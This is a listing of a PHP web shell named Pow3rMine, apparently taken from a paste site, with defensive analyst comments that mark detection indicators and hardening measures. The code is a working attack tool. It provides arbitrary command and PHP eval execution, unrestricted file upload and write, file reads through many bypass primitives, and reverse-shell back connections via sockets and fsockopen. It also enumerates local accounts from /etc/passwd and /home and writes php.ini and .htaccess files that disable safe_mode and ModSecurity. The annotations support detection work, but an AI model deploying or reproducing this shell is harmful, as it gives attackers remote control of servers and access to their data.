powermine

Simple shell php

Apr 12th, 2015
  1. <?php
  // Analyst note: this listing is a PHP web shell that titles itself "Pow3rMine".
  // The preamble below sets operator credentials, loosens PHP runtime limits and
  // derives the working directory and execution mode from request data.
  2.  
  // Hard-coded operator credentials; $uselogin == 1 enables the login gate further down.
  3. $user = 'tonlogin';
  4. $pass = 'tonmotdepasse';
  5. $uselogin = 1;
  6. $sh3llColor = "green";
  7.  
  8. # MySQL Info ---------
  // Database credentials read (via `global`) by MySQLReader() and MySQLIReader().
  9. $DBhost = "localhost";
  10. $DBuser = "root";
  11. $DBpass = "root";
  12. #---------------------
  // Runtime loosening: errors silenced, no execution time limit, the script keeps
  // running after the client disconnects, and safe_mode / open_basedir are reset
  // where the host permits it. set_magic_quotes_runtime() and safe_mode only exist
  // in PHP 5.x-era runtimes. This cluster of calls at the top of a file is a
  // useful static-detection signal when triaging a web root.
  13. session_start();
  14. error_reporting(0);
  15. set_magic_quotes_runtime(0);
  16. set_time_limit(0);
  17. ignore_user_abort(TRUE);
  18. ini_restore("safe_mode");
  19. ini_restore("open_basedir");
  20. ini_set('max_execution_time',0);
  21. ini_set('output_buffering',0);
  22. ini_set('safe_mode','Off');
  23.  
  24. // Set Current Directory
  // The working directory is taken from the POSTed 'curDir' field (passed through
  // filter(), which is defined outside the visible part of the file) and cached in
  // the session; with no POST and no cached value the script's own cwd is used.
  25. if(!$_POST && !$_SESSION['curDir']) {
  26. $dir = getcwd();
  27. $_SESSION['curDir'] = $dir;
  28. } else if(empty($_POST['curDir'])) {
  29. $dir = $_SESSION['curDir'];
  30. } else {
  31. $dir = filter($_POST['curDir']);
  32. $_SESSION['curDir'] = $dir;
  33. }
  34. // Set Dir Mode
  // 'dir_mode' comes from the query string and is remembered in the session.
  35. if($_GET['dir_mode']) {
  36. $dir_mode = $_GET['dir_mode'];
  37. $_SESSION['dir_mode'] = $dir_mode;
  38. } else {
  39. $dir_mode = $_SESSION['dir_mode'];
  40. }
  41.  
  42. // Set Usable Command
  // The POSTed 'exe_method' value selects the execution method; the default is "exec".
  43. if($_POST['exe_method']) {
  44. $exec_method = $_POST['exe_method'];
  45. } else {
  46. $exec_method = "exec";
  47. }
  48. # Logout
  // Logout is client-side only: it emits JavaScript that blanks the two cookies and
  // reloads the page. $_SERVER['PHP_SELF'] is written into the script unescaped.
  49. if($_POST['logout']) {
  50. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  51. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  52. }
  // OS guess: a path whose second character is ':' is treated as Windows, anything else as Linux.
  53. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  // phpinfo() is emitted for any request carrying an 'info' query parameter; this
  // line runs before the login gate, so the disclosure is not behind it.
  54. if($_GET['info']){phpinfo();}
  55. $safeMode = SafeMode();
  // $SERVER_SOFTWARE is never assigned in the visible code — presumably relies on
  // register_globals; verify against the rest of the file.
  56. $server = substr($SERVER_SOFTWARE,0,120);
  57. $daemon = "";
  58. ?>
  59. <html>
  60. <head>
  61. <title>Pow3rMine</title>
  62. <link rel="shortcut icon" href='https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ' />
  63. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  64. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  65. <?php echo CSS($sh3llColor); ?>
  66.  
  67. </head>
  68. <body dir='ltr'>
  69. <?php
  70. # ---------------------------------------#
  71. # Authentication #
  72. #----------------------------------------#
  // Analyst note: the login gate is cookie based. The 'user' cookie is compared with
  // $user and the 'pass' cookie with md5($pass), both with loose comparison. The
  // cookies are written by inline JavaScript, so they carry no HttpOnly or Secure
  // attribute and the password travels as an unsalted MD5 in every request.
  73. if ($uselogin ==1) {
  74. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  // When any query parameters are present, $user and $pass are overwritten from the
  // request before the form comparison below. The gate therefore does not restrict
  // use to whoever knows the configured credentials; during incident response,
  // treat a deployed copy as reachable by any party that found its URL.
  75. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  76. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  // The POSTed username is written into a script block without escaping.
  77. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  78. } else {
  79. if($_POST['usrname']){
  80. print'<script>alert("Nike ta mère ffddddpppp");</script>';
  81. }
  82. ?>
  83. <br><br>
  84. <center><img src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ"><br />
  85. <sy>Pow3rMine</sy>
  86. </center><br />
  87. <div align="center">
  88. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  89. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  90. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  91. <input type="submit" value=" Login " name="login" />
  92. </form>
  93. </div>
  94. <?php
  // footer() is defined outside the visible part of the file; exit stops the
  // control panel below from rendering when the login check fails.
  95. footer();
  96. exit;
  97. }
  98. }
  99. }
  100. ?>
  101. <table cellpadding='0' cellspacing='0' width='100%'>
  102. <tr>
  103. <td width='160'>
  104. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  105. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://www.vexilenetwork.fr/dvz.png' width='100%' height='100%'></a><br>
  106. <center>PowerMine™
  107. <p></p>
  108. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  109. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  110. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  111. </select>
  112. </center>
  113. </td>
  114. <td>
  115. <form method="post">
  116. <table width='100%' style="border:none; padding:2px;" >
  117. <tr>
  118. <td width='103'>System</td>
  119. <td width="323"><?php echo $os; ?></td>
  120. <td width="90">Apache Modules</td>
  121. <td width="278"><select ><?php
  122. if(function_exists("apache_get_modules")) {
  123. foreach (apache_get_modules() as $module) {
  124. echo "<option>".$module."</option>";
  125. }
  126. }else {
  127. echo "<option>NONE</option>";
  128. }
  129. ?></select></td>
  130. </tr>
  131. <tr>
  132. <td>uname </td>
  133. <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  134. <td>Curl</td>
  135. <td><?php echo Curl(); ?></td>
  136. </tr>
  137. <tr>
  138. <td>pwd</td>
  139. <td><?php echo getcwd(); ?></td>
  140. <td>Open Basedir</td>
  141. <td><?php echo openBaseDir(); ?></td>
  142. </tr>
  143. <tr>
  144. <td>whoami</td>
  145. <td><?php echo get_current_user(); ?></td>
  146. <td>Magic_Quotes</td>
  147. <td><?php echo magicQouts(); ?></td>
  148. </tr>
  149. <tr>
  150. <td>Server</td>
  151. <td><?php echo $server; ?></td>
  152. <td>Register Globals</td>
  153. <td><?php echo RegisterGlobals(); ?></td>
  154. </tr>
  155. <tr>
  156. <td>Server Name</td>
  157. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  158. <td>Gzip</td>
  159. <td><?php echo Gzip(); ?></td>
  160. </tr>
  161. <tr>
  162. <td>Your IP</td>
  163. <td><?php echo GetRealIP(); ?></td>
  164. <td>Oracle</td>
  165. <td><?php echo Oracle(); ?></td>
  166. </tr>
  167. <tr>
  168. <td>Server IP</td>
  169. <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  170. <td>MSQL</td>
  171. <td><?php echo MSQL(); ?></td>
  172. </tr>
  173. <tr>
  174. <td>PHP Version</td>
  175. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  176. <td>MySQL</td>
  177. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  178. </tr>
  179. <tr>
  180. <td>Safe Mode</td>
  181. <td><?php echo $safeMode; ?></td>
  182. <td>MySQLi</td>
  183. <td><?php echo MysqlI(); ?></td>
  184. </tr>
  185. <tr>
  186. <td>disable functions</td>
  187. <td><select name="disableFunctions"><?php
  188. $funArray = DisableFunctions();
  189. $funArray = explode(",",$funArray);
  190. sort($funArray);
  191. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  192. ?></select>
  193. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  194. </td>
  195. <td>MsSQL</td>
  196. <td><?php echo MsSQL(); ?></td>
  197. </tr>
  198. </table>
  199. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  200. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  201. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  202.  
  203. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  204. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  205. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  206. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  207. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  208. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  209. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  210. <br>
  211. </form>
  212. </table>
  213.  
  214. <form method="post">
  215. <center>
  216. <textarea cols="150" rows="20" name="result" >
  217. <?php
  // Analyst note: request dispatcher. Each branch is selected by the name of the
  // submit button (or CON_Type) present in the POST body, and its output lands in
  // the surrounding textarea. The field names used here (CMD_Execute, PHP_Execute,
  // UPLOAD_Execute, READ_Execute, STOP_Execute, CON_Type, ...) are practical
  // search terms for WAF rules and for POST bodies captured in logs.
  // ScanDirs(), Exe(), filter() and GenerateFile() are defined outside the visible lines.
  218. chdir($dir);
  219. if($_POST['login'] || !$_POST){echo ScanDirs();}
  // OS command execution: the POSTed command line goes through filter() and
  // urldecode() into Exe().
  220. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  // PHP code execution: the POSTed text is handed to Evaluation(), which calls eval().
  221. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  // File upload: each uploaded file is written into the current directory under the
  // client-supplied name, with no check on name, type or size.
  222. else if($_POST['UPLOAD_Execute']) {
  223. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  224. if($_FILES['uploadfile']['name'][$i] != '') {
  225. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  226. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  228. "; }
  229. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
  230. ";}
  231. }
  232. }
  233. }
  // File read for editing: the contents of the requested path are echoed, HTML-escaped.
  234. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  // File write: the textarea contents are written to the POSTed FILE_NAME via GenerateFile().
  235. else if($_POST['SAVE_Execute']) {
  236. $content = filter($_POST['result']);
  237. if(empty($content)){$content = " ";}
  238. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  239. }
  // File read through a selectable primitive: READ_Type picks one of many PHP
  // functions or helper wrappers to read the same path — presumably so that a read
  // still succeeds when some functions are disabled or path-restricted (inferred
  // from the variety offered, not stated in the code). The file is opened 'r+'
  // (read/write) regardless of the type chosen.
  240. else if($_POST['READ_Execute']) {
  241. $path = urldecode(filter($_POST['READ_Line']));
  242. $file = fopen($path,'r+');
  243. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
  244. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  245. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  246. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  247. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  248. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  249. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  250. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  251. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  252. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  253. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  254. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  255. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  256. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  257. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  258. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  259. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  260. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  261. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  262. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  263. }
  // Hardening rollback: writes a php.ini and a .htaccess into the current directory.
  // The php.ini asks for safe_mode, disable_functions and open_basedir to be off;
  // the .htaccess switches off ModSecurity 1.x-style SecFilter* directives and points
  // PHPRC at the dropped php.ini. An unexpected php.ini/.htaccess pair with this
  // content in a web directory is a strong compromise indicator. Hosts that set
  // AllowOverride None and do not honour per-directory php.ini files are not
  // affected by these two files.
  264. else if($_POST['STOP_Execute']) {
  265. $genTry = GenerateFile("php.ini","
  266. safe_mode = Off
  267. disable_functions = NONE
  268. safe_mode_gid = OFF
  269. open_basedir = OFF");
  270. if($genTry){echo "[+] php.ini Has Been Generated Successfully
  271. ";}
  272. else {echo "[-] Failed to generate php.ini file !!
  273. ";}
  274.  
  275. $genTry = GenerateFile(".htaccess","
  276. <IfModule mod_security.c>
  277. SecFilterEngine Off
  278. SecFilterScanPOST Off
  279. SecFilterCheckURLEncoding Off
  280. SecFilterCheckCookieFormat Off
  281. SecFilterCheckUnicodeEncoding Off
  282. SecFilterNormalizeCookies Off
  283. </IfModule>
  284. <Limit GET POST>
  285. order deny,allow
  286. deny from all
  287. allow from all
  288. </Limit>
  289. <Limit PUT DELETE>
  290. order deny,allow
  291. deny from all
  292. </Limit>
  293. SetEnv PHPRC ".getcwd()."/php.ini
  294. ");
  295. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  296. ";}
  297. else {echo "[-] Failed to generate .htaccess file !!
  298. ";}
  299. }
  // Outbound "back connection" (sockets extension): opens a TCP connection from the
  // web server to the POSTed ip/port, then passes whatever arrives on the socket to
  // shell_exec() and writes the output back. Detection: outbound connections
  // initiated by the web server / PHP worker process; the banner string below is a
  // usable network signature. Egress filtering on web hosts blocks this path.
  300. else if($_POST['CON_Type'] == "socks") {
  301. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  302. if($sock < 0){echo "[-] failed to create socket.";}
  303. else {
  304. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  305. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  306. else {
  307. $send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
  308. socket_write($sock, $send_var, strlen($send_var));
  309. while($input = socket_read($sock, 10000)) {
  310. socket_write($sock, shell_exec($input), 12000);
  311. }
  312. }
  313. }
  314. } else if($_POST['CON_Type'] == "fsockopen") {
  // Same outbound connection through fsockopen(); on connect it sends a banner plus
  // the output of uname/pwd/id. The banner text differs from the sockets variant
  // and is likewise usable as a network signature.
  315. $ip = filter(trim($_POST['ip']));
  316. $port = filter(trim($_POST['port']));
  317. if (!empty($ip)) {
  318. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  319. if (!$con_fsockopen){
  320. $result = "Error: didnt connect !!!";
  321. } else {
  322. $newLine="\n";
  323. fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  324. fputs($con_fsockopen , system("uname -a") .$newLine );
  325. fputs($con_fsockopen , system("pwd") .$newLine );
  326. fputs($con_fsockopen , system("id") .$newLine.$newLine );
  327. while(!feof($con_fsockopen)){
  328. fputs ($con_fsockopen);
  329. $one="[$";
  330. $two="]";
  331. $result= fgets ($con_fsockopen, 8192);
  332. $message = $result;
  333. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  334. }
  335. fclose ($con_fsockopen);
  336. }
  337. }
  338. }
  // Local account enumeration: five variants (mail spool listing, /etc/passwd,
  // /home directory listings, realpath of /etc/passwd).
  339. else if($_POST['USERS_1']){echo GetUsers1();}
  340. else if($_POST['USERS_2']) {
  341. $array = GetUsers2();
  342. foreach($array as $line)
  343. {echo $line."
  344. ";}
  345. }
  346. else if($_POST['USERS_3']) {
  347. $array = GetUsers3();
  348. foreach($array as $line)
  349. {echo $line."
  350. ";}
  351. }
  352. else if($_POST['USERS_4']) {
  353. $array = GetUsers4();
  354. foreach($array as $line)
  355. {echo $line."
  356. ";}
  357. } else if($_POST['USERS_5']){echo GetUsers5();}
  // Creates a "forbidden" directory holding a .htaccess that makes Apache serve
  // .php and .html as text/plain and use sea.txt as index/header/readme; the status
  // message tells the operator to place a symlink named sea.txt there. Indicator: a
  // directory of that name with such a .htaccess. On shared hosting,
  // SymLinksIfOwnerMatch (or no FollowSymLinks) together with a restricted
  // AllowOverride limits what such a directory can expose.
  358. else if($_POST['forbidden_bypass']) {
  359. mkdir("forbidden");
  360. chdir("forbidden");
  361. $forbidden_htaccess = GenerateFile(".htaccess", "
  362. DirectoryIndex sea.txt
  363. HeaderName sea.txt
  364. ReadmeName sea.txt
  365. footerName sea.txt
  366. ErrorDocument 404 /404.html
  367. 404.html = Symlinked sea.txt
  368. Options all
  369. ForceType text/plain
  370. AddType text/plain .php
  371. AddType text/plain .html
  372. AddHandler server-parsed .php
  373. AddHandler txt .php
  374. ");
  375. if($forbidden_htaccess) {
  376. echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  377. } else {
  378. echo "[-] error with generating .htaccess file.";
  379. }
  380. } else if($_POST['find_755']) {
  // Lists other accounts' public_html directories whose mode is exactly drwxr-xr-x.
  381. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  382. }
  383. ?></textarea>
  384. <?php
  385. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  386. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  387. ";}
  388. ?>
  389. </center></form>
  390. <table width='100%'>
  391. <tr valign="top">
  392. <td width='30%'>
  393. <!-- Command Line -->
  394. <form method='POST' enctype="multipart/form-data">
  395. <table height='72' border='0' id='Box' width="100%">
  396. <tr>
  397. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  398. <td style="background-color:#666;padding-left:10px;">Edit File
  399. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  400. </tr>
  401. <tr>
  402. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  403. </tr>
  404. </table>
  405. </form>
  406. <!-- End Of Command Line-->
  407.  
  408. </td>
  409. <td width='30%' height='30'>
  410. <!-- Command Line -->
  411. <form method='POST' enctype="multipart/form-data">
  412. <table height='72' border='0' id='Box'>
  413. <tr>
  414. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  415. <td style="background-color:#666;padding-left:10px;">Command Line
  416. <?php echo print_exe_method(); ?>
  417. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  418. </td>
  419. </tr>
  420. <tr>
  421. <td height="45" colspan="2">
  422. <?php echo SelectCommand($os); ?>
  423. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  424. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  425. </tr>
  426. </table>
  427. </form>
  428. <!-- End Of Command Line-->
  429. </td>
  430. <td width='30%' height='30' valign="top">
  431. <!-- Commands Alias-->
  432. <form method='POST' enctype="multipart/form-data">
  433. <table width='100%' height='72' border='0' id='Box'>
  434. <tr>
  435. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  436. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
  437. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  438. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  439. </span></td>
  440. </tr>
  441. <tr>
  442. <td height="45" colspan="2">
  443. <input type='file' name='uploadfile[]'>
  444. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  445. </tr>
  446. </table>
  447. </form>
  448. <!-- End Of Commands Alias-->
  449. </td>
  450. </tr>
  451. <tr valign="top">
  452. <td width='30%'>
  453. <!-- Commands Alias-->
  454. <form method='POST' enctype="multipart/form-data">
  455. <table width='100%' height='72' border='0' id='Box'>
  456. <tr>
  457. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  458. <td style="background-color:#666;padding-left:10px;">PHP Eval
  459. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  460. </tr>
  461. <tr>
  462. <td height="45" colspan="2"><label for="PHP_Line"></label>
  463. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  464. fwrite($file,"Hacked");
  465. fclose($file);';}
  466. ?>
  467. </textarea>
  468. <br></td>
  469. </tr>
  470. </table>
  471. </form>
  472. <!-- End Of Commands Alias-->
  473. </td>
  474. <td width='30%' height='30'>
  475. <!-- Commands Alias-->
  476. <form method='POST' enctype="multipart/form-data">
  477. <table width='100%' height='72' border='0' id='Box'>
  478. <tr>
  479. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  480. <td style="background-color:#666;padding-left:10px;">Read Files
  481.  
  482. <select name="READ_Type" >
  483. <option value="file" >file</option>
  484. <option value="fgets" >fgets</option>
  485. <option value="fgetss" >fgetss</option>
  486. <option value="readfile" >readfile</option>
  487. <option value="fread" >fread</option>
  488. <option value="show_source" >show_source</option>
  489. <option value="file_get_contents" >file_get_contents</option>
  490. <option value="tempnam" >tempnam</option>
  491. <option value="copy" >copy</option>
  492. <option value="symlink" >Symlink</option>
  493. <option value="mb_send_mail" >mb_send_mail</option>
  494. <option value="highlight_file" >highlight_file</option>
  495. <option value="curl" >Curl</option>
  496. <option value="imap" >Imap</option>
  497. <option value="mysql" >MySQL</option>
  498. <option value="mysqli" >MySQLI</option>
  499. <option value="ioncube">Ion Cube</option>
  500. <option value="error_log">Error_Log</option>
  501. <option value="include">Include</option>
  502. <option value="id" >ID /etc/passwd</option>
  503. </select>
  504. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  505. </tr>
  506. <tr>
  507. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  508. </tr>
  509. </table>
  510. </form>
  511. <!-- End Of Commands Alias-->
  512. </td>
  513. <td width='30%' height='30' valign="top">
  514. <!-- Commands Alias-->
  515. <form method='POST' enctype="multipart/form-data">
  516. <table width='100%' height='72' border='0' id='Box'>
  517. <tr>
  518. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  519. <td style="background-color:#666;padding-left:10px;">Back Connection
  520. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  521. </tr>
  522. <tr>
  523. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  524. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  525. <select name="CON_Type" >
  526. <option value="socks">SOCKS</option>
  527. <option value="fsockopen">FSOCKOPEN</option>
  528. </select>
  529. </td>
  530. </tr>
  531. </table>
  532. </form>
  533. <!-- End Of Commands Alias-->
  534. </td>
  535. </tr>
  536. </table>
  537. <?php
  // Reads a file by include(): splits $path into directory and file name (separator
  // chosen from the global $os), sets include_path to the directory and includes
  // the file. Any PHP in the target is executed rather than displayed; other
  // content goes straight to output. Returns nothing.
  538. function IncludeReader($path) {
  539. global $os;
  540. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  541. $fileName = substr(strrchr($path,$slash),1);
  542. $includePath = substr($path,0,strpos($path,$fileName,0));
  543. ini_set("include_path",$includePath);
  544. include($fileName);
  545. }
  // Account enumeration, variant 1: lists /var/mail through Exe() (defined outside
  // the visible part of the file) and returns its result.
  546. function GetUsers1() {
  547. return Exe('ls /var/mail');
  548. }
  // Account enumeration, variant 2: returns the first colon-separated field of every
  // line of /etc/passwd, i.e. the login names.
  549. function GetUsers2() {
  550. $array = array();
  551. $lines = file("/etc/passwd");
  552. foreach($lines as $nr=>$val) {
  553. $str = explode(":",$val);
  554. array_push($array,$str[0]);
  555. }
  556. return $array;
  557. }
  // Account enumeration, variant 3: returns every directory entry of /home/
  // (including "." and ".."). Returns nothing when /home/ cannot be opened.
  558. function GetUsers3() {
  559. $array = array();
  560. if ($dh = opendir("/home/")) {
  561. while (($file = readdir($dh)) !== false) {
  562. array_push($array,$file);
  563. }
  564. closedir($dh);
  565. return $array;
  566. }
  567. }
  // Account enumeration, variant 4: nested opendir()/readdir() loops starting at
  // /home/ that collect the entry names found at the innermost level. At each level
  // the first readdir() result is read and discarded before the loop starts. Only
  // the outer handle is closed. Returns nothing when /home/ cannot be opened.
  568. function GetUsers4() {
  569. $dir = "/home/";
  570. $array = array();
  571. if ($dh = opendir($dir)) {
  572. $f = readdir($dh);
  573. while (($f = readdir($dh)) !== false) {
  574. $dh2=opendir($dir."/");
  575. $f2 = readdir($dh2);
  576. while (($f2 = readdir($dh2)) !== false) {
  577. $f2.="/";
  578. $dh3=opendir($dir.$f.$f2);
  579. $f3 = readdir($dh3);
  580. while (($f3 = readdir($dh3)) !== false) {
  581. array_push($array,$f3);
  582. }
  583. }
  584. }
  585. closedir($dh);
  586. return $array;
  587. }
  588. }
  // Variant 5: returns realpath('/etc/passwd') — the resolved path string (or false),
  // not the file's contents.
  589. function GetUsers5(){
  590. return realpath('/etc/passwd');
  591. }
  // Reads $path and routes the contents through error_log() in "append to file" mode
  // (message type 3) into a uniqid()-named temp file in the current directory, then
  // reads that file back, deletes it and returns the contents.
  // Indicator: short-lived files with uniqid-style names in the web directory.
  592. function ErrorLog($path){
  593. $tempFile = uniqid();
  594. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  595. error_log(file_get_contents($path), 3, $tempFile);
  596. $content = file_get_contents($tempFile);
  597. unlink($tempFile);
  598. return $content;
  599. }
  // Reads $path through a temporary symlink: creates a uniqid()-named link to $path
  // in the current directory, reads through it, removes it and returns the contents.
  // Returns nothing when symlink() is unavailable.
  // Hardening note: hosts that disable symlink() for PHP, or serve only owner-matched
  // symlinks, are not exposed to this read path.
  600. function SymlinkF($path) {
  601. $tempFile = uniqid();
  602. if(function_exists('symlink')) {
  603. symlink($path,$tempFile);
  604. $content = file_get_contents($tempFile);
  605. unlink($tempFile);
  606. return $content;
  607. }
  608. }
  // Reads $path through MySQL: connects with the configured $DBhost/$DBuser/$DBpass,
  // creates database `a` and table `a.a`, loads the file with LOAD DATA LOCAL INFILE,
  // prints every row, then drops the database. $path is concatenated into the SQL
  // text. Uses the legacy mysql_* extension.
